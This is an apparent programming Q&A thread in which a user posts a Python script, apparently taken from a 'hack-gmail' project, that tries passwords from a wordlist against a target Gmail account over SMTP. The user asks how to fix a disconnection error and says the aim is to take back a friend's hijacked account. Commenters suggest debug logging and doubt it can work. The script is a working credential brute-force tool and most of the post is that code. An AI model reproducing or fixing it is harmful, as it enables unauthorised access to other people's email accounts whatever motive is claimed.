# SMTPServerDisconnected: Connection unexpectedly closed

Tags: python, python-3.x

How the hell do I fix this?

```
smtpserver = smtplib.SMTP('smtp.gmail.com', 587) # ***tried ssl but no avail***

smtpserver.ehlo()
smtpserver.starttls()

user = input("Enter The Target Gmail Adress => ")
print("\n")

pwd = input("Enter '0' to use the inbuilt passwords list \nEnter '2' to Add a custom password list\n => ")

if pwd=='0':
    passswfile="password.txt"

elif pwd=='2':
    print("\n")
    passswfile = input("Name The File Path (For Password List) => ")

else:
    print("\n")
    print("Invalid input!")
    sys.exit(1)
try:
    passswfile = open(passswfile, "r")
except Exception as e:
    print(e)
    sys.exit(1)

for password in passswfile:
    try:
        smtpserver.login(user, password)

        print("[+] Password Found %s" % password)
        break

    except smtplib.SMTPAuthenticationError:
        print("[!] Password Is Wrong. %s " % password)
```

Below is the error I get

```
Traceback (most recent call last):
      File "C:\Users\yourmom\Downloads\hack-gmail-master\hack-gmail.py", line 56, in <module>
        smtpserver.login(user, password)
      File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.11_3.11.1264.0_x64__qbz5n2kfra8p0\Lib\smtplib.py", line 739, in login
        (code, resp) = self.auth(
                       ^^^^^^^^^^
      File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.11_3.11.1264.0_x64__qbz5n2kfra8p0\Lib\smtplib.py", line 642, in auth
        (code, resp) = self.docmd("AUTH", mechanism + " " + response)
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.11_3.11.1264.0_x64__qbz5n2kfra8p0\Lib\smtplib.py", line 432, in docmd
        return self.getreply()
               ^^^^^^^^^^^^^^^
      File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.11_3.11.1264.0_x64__qbz5n2kfra8p0\Lib\smtplib.py", line 405, in getreply
        raise SMTPServerDisconnected("Connection unexpectedly closed")
    smtplib.SMTPServerDisconnected: Connection unexpectedly closed
```

How can I fix this error?

Comment: I'd add debug logging to see what's going on here; something like `smtpserver.set_debuglevel(1)`. If the server closes the connection unexpectedly, that could mean a lot of things: bad port, encrypted vs unencrypted connection, a firewall messing with the traffic, or Google could even be blocking you if they detect a brute forcing attempt. Can't you use the regular password recovery mechanism in Gmail for this?

Comment: The problem is that the hacker completely removed and changed the mobile number 2fa and password so the regular method wont work because the recovery otp/email is not sent to my friend instead it is sent to the hacker

Comment: On top of that the account ownership questions also failed no matter how many times my friend tried it.

Comment: So I need a way to hack my friends account back for him

Comment: Yeah, err, good luck.. no chance. If the attacker already managed to get in they probably already changed passwords.